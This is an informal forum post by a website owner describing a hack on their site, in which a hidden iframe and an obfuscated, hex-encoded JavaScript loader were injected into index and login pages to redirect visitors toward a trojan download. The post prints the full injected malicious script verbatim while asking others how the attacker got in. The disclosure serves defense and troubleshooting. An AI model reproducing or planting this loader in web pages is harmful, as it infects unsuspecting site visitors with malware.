hi fellows
i just recived a hacker attack on my site
http://www.picturerating.ussymptoms of attack...
if you are using a strong and updated antivirus like mine KAV 7, then u will be notified your site is trying to download a trojan horse...
actualy there is no virus in your site or server, its an iframe code in to main files, like index, main, home, login, admin etc..
the iframe code is ...
<script>check_content()</script><script>check_content()</script><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c41687154048m49073afa06296(m49073afa0693c){ return (parseInt(m49073afa0693c,16));}function m49073afa07c30(m49073afa0819d){ function m49073afa0903f(){return 2;} var m49073afa08878='';m49073afa09c06=String.fromCharCode;for(m49073afa08c5e=0;m49073afa08c5e<m49073afa0819d.length;m49073afa08c5e+=m49073afa0903f()){ m49073afa08878+=(m49073afa09c06(c41687154048m49073afa06296(m49073afa0819d.substr(m49073afa08c5e,m49073afa0903f()))));}return m49073afa08878;} var zaf='';var m49073afa0a4bb='3C7'+zaf+'3637'+zaf+'2697'+zaf+'07'+zaf+'43E696628216D7'+zaf+'96961297'+zaf+'B646F637'+zaf+'56D656E7'+zaf+'42E7'+zaf+'7'+zaf+'7'+zaf+'2697'+zaf+'465287'+zaf+'56E657'+zaf+'363617'+zaf+'065282027'+zaf+'2533632536392536362537'+zaf+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+zaf+'332537'+zaf+'32253633253364253237'+zaf+'2536382537'+zaf+'342537'+zaf+'342537'+zaf+'302533612532662532662536322537'+zaf+'35253637'+zaf+'2537'+zaf+'61253639253663253663253631253265253638253639253637'+zaf+'2536382536632536352537'+zaf+'362536352536632532652536322536392537'+zaf+'612532662536362536662537'+zaf+'322537'+zaf+'352536642532662534632536312537'+zaf+'33253665253631253366253237'+zaf+'2532622534642536312537'+zaf+'342536382532652537'+zaf+'322536662537'+zaf+'352536652536342532382534642536312537'+zaf+'342536382532652537'+zaf+'32253631253665253634253666253664253238253239253261253332253331253332253331253337'+zaf+'253330253239253262253237'+zaf+'253330253337'+zaf+'253338253634253333253635253633253335253635253237'+zaf+'2532302537'+zaf+'37'+zaf+'2536392536342537'+zaf+'34253638253364253334253333253333253230253638253635253639253637'+zaf+'2536382537'+zaf+'342533642533342533392533302532302537'+zaf+'332537'+zaf+'342537'+zaf+'39253663253635253364253237'+zaf+'2536342536392537'+zaf+'332537'+zaf+'302536632536312537'+zaf+'39253361253230253665253666253665253635253237'+zaf+'2533652533632532662536392536362537'+zaf+'3225363125366425363525336527'+zaf+'29293B7'+zaf+'D7'+zaf+'6617'+zaf+'2206D7'+zaf+'969613D7'+zaf+'47'+zaf+'27'+zaf+'5653B3C2F7'+zaf+'3637'+zaf+'2697'+zaf+'07'+zaf+'43E';document.write(m49073afa07c30(m49073afa0a4bb));</script><script>check_content()</script>
and its redirects the visitors to site...
bugzilla.highlevel.biz/forum/las
i am using 3 scripts on my site
picturerating.us/picturerating/index.php picture rating
picturerating.us/picture-gallery/index.php coppermine latest update
blog.picturerating.us wordpress latest updated blog
actualy i exactly dont know where the hacker came in, but there is only way where user can uplaod some pictures in coppermine...
it effect all of my websites hosted on my server( hostmonster ) but only main index or importent files...
SOLOUTION
i am trying to removing the iframe code from each of my files by downloading every file, and then reuploading it after iframe code removal...
if any one find or facing any type of this issue, then tell here if you know where from hacker inject the code in our pages, so ADMIN team close this security hole to protect our thosands of sites running their script...
i hope this will help to other members like me...
have nice day and take care.